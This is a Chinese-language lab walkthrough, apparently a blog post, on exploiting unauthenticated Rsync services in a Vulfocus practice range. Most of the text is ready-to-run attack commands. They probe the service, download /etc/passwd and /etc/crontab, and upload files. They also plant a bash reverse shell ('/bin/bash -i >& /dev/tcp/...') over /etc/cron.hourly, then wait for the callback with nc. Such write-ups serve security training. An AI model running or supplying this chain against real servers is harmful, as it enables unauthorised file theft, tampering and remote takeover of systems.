应用协议安全：Rsync-common 未授权访问.

应用协议安全：Rsync-common 未授权访问.

Rsync 是 Linux 下一款数据备份工具，支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口，如果目标开启了 rsync 服务，并且没有配置 ACL 或访问密码，我们将可以读写目标服务器文件。

---

目录：

应用协议安全：Rsync-common 未授权访问.

Rsync-common 未授权访问

靶场准备：Web安全：Vulfocus 靶场搭建.（漏洞集成平台）-CSDN博客

漏洞的测试：

第一步：测试漏洞有没有存在.

第二步：测试 读取文件.

第三步：测试 下载文件.

第四步：测试 上传文件.

第五步：测试 反弹 shell

---

Rsync-common 未授权访问

靶场准备：Web安全：Vulfocus 靶场搭建.（漏洞集成平台）-CSDN博客

---

漏洞的测试：

第一步：测试漏洞有没有存在.

rsync rsync://172.16.10.130:10890

rsync rsync://测试 IP 地址:端口

---

第二步：测试 读取文件.

rsync rsync://172.16.10.130:55803/src/

---

第三步：测试 下载文件.

rsync rsync://172.16.10.130:10890/src/etc/passwd ./

rsync rsync://测试 IP 地址:端口/src/etc/passwd 下载到这个文件路径下

---

第四步：测试 上传文件.

rsync -av passwd rsync://172.16.10.130:10890/src/tmp/passwd 

rsync -av 要上传文件 rsync://172.16.10.130:10890/路径/

rsync rsync://172.16.10.130:10890/src/tmp/passwd      #读取的文件.

---

第五步：测试 反弹 shell

前提条件先了解：Crontab是一种运行于 Linux系统 下的定时任务管理器。它可以在指定时间执行特定的命令或脚本，并且可以设置重复周期.

直接下载 crontab 文件：

rsync rsync://172.16.10.130:10890/src/etc/crontab /root/bgxg.txt

​

---

所以知道他17分钟后执行这个文件，我们就可以创建一个反弹shell的文件来替换他.

---

touch bgxg        #创建新文件.

vim bgxg          #编辑文件.

#添加在文件中的内容
/bin/bash -i >& /dev/tcp/172.16.10.130/5566 0>&1

chmod +x bgxg     #添加权限.

​

​

---

再进行上传bgxg文件，把cron.hourly替换了

rsync -av bgxg rsync://172.16.10.130:55790/src/etc/cron.hourly

​

​

---

监听这个端口就等着反弹就好.（由于靶场时间比较短，就不等反弹时间了）

nc -lvvp 5566

​

   

   

    

 学习链接：第57天：服务攻防-应用协议_Rsync_SSH_RDP_FTP_漏洞批扫_口令猜解_哔哩哔哩_bilibili